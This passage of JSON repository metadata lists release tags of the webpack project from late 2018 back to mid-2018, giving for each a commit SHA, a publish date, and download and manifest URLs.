bpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92